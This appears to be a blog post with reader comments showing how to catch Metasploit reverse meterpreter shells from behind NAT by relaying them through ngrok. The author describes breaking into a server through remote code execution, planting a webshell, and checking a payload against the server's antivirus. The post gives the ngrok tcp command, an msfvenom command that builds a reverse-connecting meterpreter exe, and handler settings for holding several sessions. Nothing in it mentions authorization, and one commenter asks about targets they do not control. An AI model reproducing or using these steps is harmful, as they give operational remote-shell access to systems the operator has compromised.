When I run Metasploit from my own machine, I can't always get a reverse connection back through NAT.
Now here's the current situation!
- I found a server vulnerable to remote code execution (RCE).
- Uploaded a webshell to gather some info.
- Uploaded an exe after carefully testing it against the AV installed on the server.
- Booted up Metasploit.
- Tried to exploit it to get a bind shell, but unfortunately the bind shell isn't working (firewall, as always).
- Let's do a reverse shell then ;)
- But there's another problem :(
- I'm sitting in the office and sadly I don't have the router login credentials to set up port forwarding :(
Now what to do?
Here comes Ngrok to the rescue. :D
What's Ngrok?
"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their website
Setting up Ngrok
1. Register with ngrok. (It doesn't verify the email address, though.)
2. Once you're logged in, just follow the instructions. You'll get a screen like this.
3. Once the setup is done, run the following command. ngrok opens a TCP listener on a random public port and forwards every connection it receives to port 80 on our system behind NAT. Note the public host and port it prints on its "Forwarding" line: those are what the payload must connect to, while our handler listens on local port 80.
./ngrok tcp 80
4. Generate a meterpreter exe with the ngrok settings and set up a handler to accept the reverse meterpreter connection. LHOST is the ngrok hostname and LPORT is the public port ngrok assigned (12791 in this run); the reverse_tcp_dns stager is used because it resolves the hostname on the target instead of needing an IP address:
msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe
The above command generates a plain exe containing only the meterpreter stager. NOTE: I'm NOT sharing techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if it's custom-made); that's a very stupid thing to do, since the sample gets shared with the AV vendors. Better to use vt-notify by @Mubix, a great tool!
5. Now execute the exe on the server and you'll see the words that'll make you go crazy: "Sending stage (... bytes)" ;)
Now where did "127.0.0.1" come from? o_O
Ngrok hands the tunnelled connection to our handler from the ngrok client running on the same box, so the handler sees the peer as "127.0.0.1" rather than the target's address. When the handler receives the stager's connection and starts sending the stage to the server, the traffic goes back out through that same forwarded localhost port. One consequence: the session's recorded source IP tells you nothing about which target connected, so take the real address from the ngrok dashboard or from the session itself.
Ngrok Dashboard can help you see the number of connections you're having.
6. A drawback with this method: a handler started with the default options stops listening after its first session, so you can't collect multiple meterpreter sessions over a single port; for more sessions you'd repeat all the steps with a different port. (Setting ExitOnSession to false on the handler and running it as a job with exploit -j keeps it listening, and one ngrok tunnel carries any number of connections, so the same tunnel port can then serve several sessions.)
I Hope this helps.
Thanks & Cheers!!
Wonderful work, that's new and it worked. Thanks for sharing!!
Will this work with android_meterpreter_tcp??
Yes, sure it will, and I am even working on something like "how to use a fixed URL on ngrok".
I'm having a problem with this. I am able to receive the target's action (which is running the payload), but then, after connecting to the open session created by the target, I can't execute meterpreter commands. :/
Hello,
I was playing around with ngrok and Metasploit and my virtual machines.
I have a problem with the reverse tcp exploit.
It doesn't give the meterpreter payload..
[-] Handler failed to bind to ip of ngrok ip :4444:-
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit aborted due to failure: unknown: remote ip :8080 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
Is ngrok worth it for this purpose?
What should I do?
Thank you
But what if I haven't had any control over the target? (